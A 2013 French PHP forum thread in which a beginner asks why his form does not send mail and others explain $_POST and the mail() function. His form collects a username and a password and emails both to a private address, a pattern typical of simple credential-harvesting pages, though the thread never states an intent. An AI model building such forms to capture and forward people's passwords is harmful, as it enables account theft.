Page 1 sur 1

Mon formulaire par mail ne marche pas

Posté : 05 juin 2013, 18:06
par LamateurApple
Bonjour, je cherche à envoyer un mail avec le contenu des champs de mon formulaire. Voila le code de la page formulaire:

Code : Tout sélectionner

<form method="post" action="traitement.php"> <p class="titre">Rentre ces infos:</p> <fieldset id="coordonnees"> <label>pseudo:</label> <input type="text" name="nom" size="30" /><br /> <label>mot de passe:</label> <input id="mdp" type="password" name="mdp" size="30" /><br /> </fieldset> <p id="buttons"> <input type="submit" value="Envoyer" /> <input type="reset" value="Recommencer" /> </p> </form>
Le code de la page traitement.php:
<?php
$pseudo = "nom";
$mdp = "mdp";
mail('privé@privé.com', $pseudo, $mdp);
echo "Le transfert a bien réussi, merci; ?>
Qu'est ce qui ne va pas? Merci d'avance!

Re: Mon formulaire par mail ne marche pas

Posté : 05 juin 2013, 19:36
par moogli
salut,


a priori tu ne sais pas récupérer les valeurs d'un formulaire


@+

Re: Mon formulaire par mail ne marche pas

Posté : 05 juin 2013, 19:41
par ghost5922
Bonjour,

n'y de la fonction mail http://php.net/manual/fr/function.mail.php

mail("mail","sujet","message");

Re: Mon formulaire par mail ne marche pas

Posté : 05 juin 2013, 22:30
par LamateurApple
Merci Moogli, j'ai modifié mon code en rajoutant
$_POST
mais par contre Ghost5922, pour la fonction mail() comment faire? Le lien que tu m'a donné je l'ai déjà lu mais je ne trouve pas ça clair du tout! Peux tu m'expliquer ce que je dois écrire?
J'ai modifié le code de traitement.php comme ça:
<?php
$pseudo = $_POST['nom'];
$mdp = $_POST['mdp'];
if(mail('[email protected]', $pseudo, $mdp))
{
	echo 'Le transfert a bien réussi, voila le code';
}
else
{
	echo 'Le transfert n\'a pas réussi, réessaye ultérieurement!';
} ?>
Mais je ne reçois toujours pas de mail :( est-ce lié au fait que je fasse ces essais en local? (avec MAMP)

Re: Mon formulaire par mail ne marche pas

Posté : 05 juin 2013, 22:51
par ghost5922
Bonjour

Oui je pense que cela est du au test local

Sinon pour la fonction mail

Le premier paramètre c'est l'émail client
Le second est le sujet du mail
Le troisième est le message

Après on peux envoyé un mail en format text ou html

Un exemple
<?php
     $to      = '[email protected]';
     $subject = 'le sujet';
     $message = 'Bonjour !';
     $headers = 'From: [email protected]' . "\r\n" .
     'Reply-To: [email protected]' . "\r\n" .
     'X-Mailer: PHP/' . phpversion();

     mail($to, $subject, $message, $headers);
 ?>

Re: Mon formulaire par mail ne marche pas

Posté : 06 juin 2013, 22:03
par LamateurApple
Merci à toi. Je vais essayer avec mon hébergement gratuit. Mais mon code est donc bon? Si je le met sur mon site avec une adresse mail de récéption correcte vais-je recevoir le message?